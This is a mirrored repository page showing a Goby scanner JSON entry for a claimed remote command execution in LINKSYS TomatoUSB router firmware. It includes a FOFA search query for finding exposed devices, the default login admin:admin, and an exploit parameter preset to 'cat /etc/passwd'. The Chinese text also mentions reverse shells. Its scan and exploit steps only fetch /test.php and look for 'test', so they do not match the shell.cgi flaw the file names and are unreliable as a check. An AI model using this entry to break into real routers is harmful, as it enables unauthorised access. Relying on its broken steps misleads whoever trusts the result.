qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/LINKSYS-TomatoUSB-shell.cgi...

149 lines
5.7 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "LINKSYS TomatoUSB shell.cgi RCE",
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Tomato USB is an alternative Linux-based firmware for powering Broadcom-based ethernet routers. It is a modification of the famous Tomato firmware, with additional built-in support for USB port, wireless-N mode support, support for several newer router models, and various enhancements.<br></span></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Login the LINKSYS TomatoUSB router</span></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">by defacult username and passwordadmin:admin</span></p><p><span style=\"color: rgb(64, 80, 128); font-size: 18px;\">Execute System Commands</span><br></p>",
"Product": "LINKSYS TomatoUSB",
"Homepage": "http://tomatousb.org/",
"DisclosureDate": "2022-03-25",
"Author": "atdpa4sw0rd@gmail.com",
"FofaQuery": "banner=\"TomatoUSB\" || header=\"TomatoUSB\"",
"GobyQuery": "banner=\"TomatoUSB\" || header=\"TomatoUSB\"",
"Level": "2",
"Impact": "<p>Login the LINKSYS TomatoUSB router</p><p>by defacult username and passwordadmin:admin</p><p><span style=\"color: rgb(64, 80, 128); font-size: 18px;\">Execute System Commands</span></p>",
"Recommendation": "<p>1. Change the administrator password in a timely manner</p><p>2. Prohibit the public network from accessing the device</p><p>3. Update the latest system in time</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "cat /etc/passwd",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"rce"
],
"VulType": [
"rce"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "LINKSYS TomatoUSB 路由器后台命令执行",
"Product": "LINKSYS TomatoUSB",
"Description": "<p>Tomato USB是一种基于linux的替代固件用于为基于broadcom的以太网路由器供电。它是著名的Tomato固件的一个修改具有额外的内置支持USB端口无线n模式支持支持几种较新的路由器型号以及各种增强功能。<br></p><p>LINKSYS TomatoUSB路由器登陆后默认账号admin:admin执行命令<br></p>",
"Recommendation": "<p>1、及时修改管理员密码</p><p>2、禁止公网访问设备</p><p>3、及时升级最新系统</p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">可以通过默认口令登录设备</span></span></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">执行命令反弹shell等危险操作</span><br></span></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "LINKSYS TomatoUSB shell.cgi RCE",
"Product": "LINKSYS TomatoUSB",
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Tomato USB is an alternative Linux-based firmware for powering Broadcom-based ethernet routers. It is a modification of the famous Tomato firmware, with additional built-in support for USB port, wireless-N mode support, support for several newer router models, and various enhancements.<br></span></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">Login the LINKSYS TomatoUSB router</span></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">by defacult username and passwordadmin:admin</span></p><p><span style=\"color: rgb(64, 80, 128); font-size: 18px;\">Execute System Commands</span><br></p>",
"Recommendation": "<p>1. Change the administrator password in a timely manner</p><p>2. Prohibit the public network from accessing the device</p><p>3. Update the latest system in time</p>",
"Impact": "<p>Login the LINKSYS TomatoUSB router</p><p>by defacult username and passwordadmin:admin</p><p><span style=\"color: rgb(64, 80, 128); font-size: 18px;\">Execute System Commands</span></p>",
"VulType": [
"rce"
],
"Tags": [
"rce"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink